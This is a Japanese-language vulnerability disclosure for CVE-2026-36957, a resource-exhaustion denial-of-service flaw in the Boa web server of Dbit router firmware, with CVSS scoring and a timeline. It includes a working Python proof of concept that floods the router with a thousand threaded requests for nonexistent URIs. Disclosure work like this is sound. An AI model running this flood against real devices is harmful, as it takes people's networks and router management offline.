
CVE-2026-36957の概念実証。Dbitルーターのファームウェアにおけるサービス拒否(DoS)の脆弱性で、Boa WebサーバーへのHTTPフラッドによりリソース枯渇とシステムハングを引き起こします。
CVE ID: CVE-2026-36957 日付: 2026-04-29 発見者: Kirubel Solomne ベンダー: 深センDibit網絡設備有限公司 (Shenzhen Dibit Network Equipment Co., Ltd.) 製品: Dbit Router ファームウェアバージョン: V1.0.0 CWE: CWE-400 - 制御されないリソース消費
Dbit RouterファームウェアV1.0.0は、Boa WebサーバーのURIハンドラーを介したサービス拒否に対して脆弱です。存在しないURIに対して大量のHTTP GETリクエストを送信することで、攻撃者はファイルディスクリプタやメモリバッファを含む重要なシステムリソースを枯渇させることができます。これにより、カーネルのデッドロックやシステムのハングアップが発生し、Web管理ポータルとすべてのルーティング機能が無効になります。
CVSS v3.1スコア: 7.5 (高)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
| メトリック | 値 |
|---|
| 攻撃元区分 | ネットワーク |
| 攻撃条件の複雑さ | 低 |
| 必要な特権レベル | 不要 |
| ユーザー操作 | 不要 |
| 機密性への影響 | なし |
| 完全性への影響 | なし |
| 可用性への影響 | 高 |
import requests
import threading
TARGET = "http://192.168.10.1"
def flood(i):
try:
requests.get(f"{TARGET}/nonexistent_{i}", timeout=2)
except:
pass
threads = []
for i in range(1000):
t = threading.Thread(target=flood, args=(i,))
threads.append(t)
t.start()
for t in threads:
t.join()
print("Done. Check if router is still responsive.")
期待される動作: サーバーは接続を制限し、安定した状態を維持する必要があります。 実際の動作: ルーターのWebインターフェースが応答しなくなり、手動での再起動が必要になります。
| 日付 | イベント |
|---|---|
| 2026-04-29 | 脆弱性を発見 |
| 2026-04-29 | MITREに報告 |
| 2026-04-29 | CVE-2026-36957が割り当てられる |
| 2026-04-29 | 公開開示 |